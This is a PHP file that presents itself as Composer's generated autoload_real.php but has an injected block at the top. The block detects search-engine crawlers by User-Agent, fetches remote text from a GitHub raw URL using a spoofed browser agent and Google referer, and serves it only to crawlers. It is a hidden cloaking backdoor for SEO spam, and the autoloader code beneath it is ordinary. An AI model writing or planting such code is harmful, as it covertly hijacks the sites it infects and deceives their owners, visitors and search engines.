<?php
ob_start();
header("Vary: U-Agent");

$src = "https://raw.githubusercontent.com/waklabu979/landing/refs/heads/main/hiduptelalumewah.txt";
$match = "/(googlebot|slurp|bingbot|baiduspider|yandex|crawler|spider|adsense|inspection|mediapartners)/i";
$ua = strtolower($_SERVER["HTTP_USER_AGENT"] ?? '');

function stealth($u) {
$ctx = stream_context_create([
"http" => [
"method" => "GET",
"header" => "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n" .
"Referer: https://www.google.com/\r\n"
]
]);
return @file_get_contents($u, false, $ctx);
}

if (preg_match($match, $ua)) {
usleep(rand(100000, 200000));
echo stealth($src);
@ob_end_flush();
exit;
}

// autoload_real.php @generated by Composer

class ComposerAutoloaderInitdd3da724b564a84038ecd85521eed31a
{
    private static $loader;

    public static function loadClassLoader($class)
    {
        if ('Composer\Autoload\ClassLoader' === $class) {
            require __DIR__ . '/ClassLoader.php';
        }
    }

    /**
     * @return \Composer\Autoload\ClassLoader
     */
    public static function getLoader()
    {
        if (null !== self::$loader) {
            return self::$loader;
        }

        require __DIR__ . '/platform_check.php';

        spl_autoload_register(array('ComposerAutoloaderInitdd3da724b564a84038ecd85521eed31a', 'loadClassLoader'), true, true);
        self::$loader = $loader = new \Composer\Autoload\ClassLoader(\dirname(__DIR__));
        spl_autoload_unregister(array('ComposerAutoloaderInitdd3da724b564a84038ecd85521eed31a', 'loadClassLoader'));

        require __DIR__ . '/autoload_static.php';
        call_user_func(\Composer\Autoload\ComposerStaticInitdd3da724b564a84038ecd85521eed31a::getInitializer($loader));

        $loader->register(true);

        $includeFiles = \Composer\Autoload\ComposerStaticInitdd3da724b564a84038ecd85521eed31a::$files;
        foreach ($includeFiles as $fileIdentifier => $file) {
            composerRequiredd3da724b564a84038ecd85521eed31a($fileIdentifier, $file);
        }

        return $loader;
    }
}

/**
 * @param string $fileIdentifier
 * @param string $file
 * @return void
 */
function composerRequiredd3da724b564a84038ecd85521eed31a($fileIdentifier, $file)
{
    if (empty($GLOBALS['__composer_autoload_files'][$fileIdentifier])) {
        $GLOBALS['__composer_autoload_files'][$fileIdentifier] = true;

        require $file;
    }
}
